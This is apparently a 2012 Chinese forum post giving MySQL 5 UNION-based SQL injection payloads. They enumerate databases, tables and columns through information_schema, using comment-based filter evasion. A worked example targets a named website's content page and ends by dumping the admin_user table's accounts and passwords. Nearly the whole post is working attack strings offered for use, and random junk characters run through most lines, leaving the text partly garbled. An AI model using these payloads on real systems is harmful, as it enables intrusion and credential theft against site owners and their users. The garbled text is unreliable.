查库
% s' y; C, C) d7 h$ V/ _" d: g' L# H9 F# v9 A0 a
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
0 o* B" R" A; m
( S y% u* F+ Y. G: l, Q! G2 i' u4 q# }查表- o5 N6 E9 F7 v5 Z$ o
4 a4 E( B) t0 g! @; |id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
t! p' I1 h5 M' B+ W9 F" `' j
8 \6 S5 ]* X( Q$ o! Z/ Q查段
0 G0 C8 f5 h( i4 K$ ^
- `$ b* m8 Z1 G1 v, Oid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1; W$ a s& \7 ?# \; U9 K
) ]/ ? ^. \7 \8 J& ^0 E
* ? Y0 ]: N: j. W( y Bmysql5高级注入方法暴表- U+ r2 U4 G) J! k. |- \
8 x/ n* d' u+ c# L9 _
例子如下:0 v3 r, ? L6 y2 k! U* p+ ~2 v
, `5 P [# S2 L7 {1 E
1.爆表& a9 W% o& H5 H3 g& x0 e
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)8 {4 h8 r2 e* j' F" n8 S8 C! {' t
这样爆到第4个时出现了admin_user表。9 S, [6 A8 {: \- t
6 Q. n" S. x$ b. b
2.暴字段
, n6 s2 x* N0 {; H' y% z4 Dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*" b" o3 @4 {% P4 N \% o8 s Y3 p
2 t3 @+ D4 e6 L4 ?2 F! E4 c* ^4 k0 l. L- G m$ e
3.爆密码
- K3 h( R/ H* vhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* & a& Y( w) d& T, D4 K4 v8 N1 d% s& t; t
! d! |& o0 o& A& g J, k8 w0 b8 s. L7 x% P8 X" y9 e6 ~
|
发表于 2012-9-13 16:29:37
收藏
支持
反对